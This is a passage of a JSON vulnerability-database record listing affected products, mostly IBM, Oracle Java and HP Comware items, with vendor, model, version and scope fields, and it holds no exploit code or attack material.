"trust": 0.3, "vendor": "ibm", "version": "8.0.43" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "jrockit r27.8.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.11" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "system networking rackswitch g8332", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "netinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "smartcloud provisioning ifix6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.1" }, { "model": "optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "hsr6602 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7550" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.2" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.2" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "operations manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.10" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "mashup center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1.1" }, { "model": "jrockit r27.7.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.24" }, { "model": "jdk update9", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.043" }, { "model": "java se embedded 7u60", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "data server driver for odbc and cli", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1000" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.060" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.411" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "bsm connector", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "infosphere optim performance manager for db2 on windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6.0" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "java sdk sr14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "oceanstor replicationdirector v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59307)0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.4" }, { "model": "db2\u00ae enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.7" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "infosphere optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "msr3000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7)0" }, { "model": "tivoli storage productivity center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.199" }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.41" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.10" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3" }, { "model": "jre update4", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.2" }, { "model": "db2 connect unlimited edition for system z fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.4" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.35" }, { "model": "system storage ts2900 tape librray", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "0037" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.5.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.3" }, { "model": "tivoli netcool impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.75" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "6125xlg", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "netcool/system service monitor fp1 p14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0-" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.11" }, { "model": "oceanstor 18800f v100r001c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli monitoring for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9000" }, { "model": "oceanstor v100r001c10", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "websphere integration developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.5" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "abyp-2t-1s-1l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "content manager enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.11" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.36" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.3" }, { "model": "megaraid storage manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "15.05.01.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "infosphere optim configuration manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "content manager enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75007)0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.1" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.051" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "oceanstor s2600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.34" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.29" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0" }, { "model": "websphere message broker toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "105007)0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.195" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.034" }, { "model": "java sdk sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205577" }, { "model": "data server driver for odbc and cli", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "jrockit r28.3.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "abyp-2t-2s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.6" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "flex system chassis management module 2pet12r", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.13" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.51" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "infosphere global name management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "abyp-0t-4s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "emptoris supplier lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.4" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "7.4" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "network advisor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "infosphere optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.184" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.20" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.4" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.13.0" }, { "model": "release control software p3", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.038" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.35" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.07" }, { "model": "optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35507914" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073800" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.11" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "jdk update7", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.3" }, { "model": "flex system chassis management module 2pet10c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "operations manager for unix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.38" }, { "model": "db2\u00ae enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "system networking rackswitch g8264-t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.100" }, { "model": "jre update11", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "power systems 350.b0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.35" }, { "model": "smb1920 (comware r1106", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "system idataplex dx360 m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63910" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "emptoris strategic supply management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.22" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "jrockit r27.7.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "jre update17", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.303" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "(comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59007)0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2202585" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.16.2" }, { "model": "hp-ux apache-based web server", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.15.21" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.11" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "tivoli netcool impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.2" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli asset discovery for distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "msr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9xx5)0" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.5" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux mips", "scope": 